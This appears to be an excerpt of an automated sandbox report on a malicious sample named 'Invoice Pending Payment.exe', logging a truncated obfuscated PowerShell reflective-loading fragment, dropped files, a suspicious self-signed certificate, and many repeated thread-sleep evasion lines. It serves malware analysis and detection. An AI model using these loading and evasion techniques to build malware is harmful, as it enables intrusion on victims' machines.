Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spiritualty)), $Kadaverdisciplins).DefineDynamicModule($Agribusiness, $false).DefineType($Auricyanic, $Tenuis, [System.MulticastDelega

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Code function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405E92

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04BBA537 push eax; iretd	1_2_04BBA5C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04BBEDD8 push eax; mov dword ptr [esp], edx	1_2_04BBEDEC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_075BF638 push esp; iretd	1_2_075BF639
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_090E2B20 push 8BD38B50h; iretd	1_2_090E2B36
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_090E0259 push 8BD68B50h; retf	1_2_090E025F

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) The email domain 'Tredjeprmier.Sh' is extremely suspicious - .sh is a Somalia TLD and the domain name appears randomly generated. 2) Organization name 'Breweries' is generic and doesn't match a legitimate corporate entity. 3) The OU field contains seemingly random Danish/Germanic words that make no sense together. 4) Self-signed certificate (issuer same as subject) which failed validation and isn't trusted. 5) Large time gap between compilation date (2013) and certificate dates (2024-2025) suggests possible certificate manipulation. 6) While US location is given, other fields suggest foreign origin trying to appear US-based. The combination of random/nonsensical fields, failed validation, and apparent attempts to obscure true origin strongly indicate a malicious file.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File created: C:\Users\user\AppData\Local\Temp\nssAB11.tmp\nsExec.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594431	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594326	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5368			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4422			Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssAB11.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7724	Thread sleep count: 1120 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7724	Thread sleep count: 8702 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -599047s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -598329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -598204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -597954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -597829s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -597704s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -597579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7720	Thread sleep time: -596860s >= -30000s	Jump to behavior
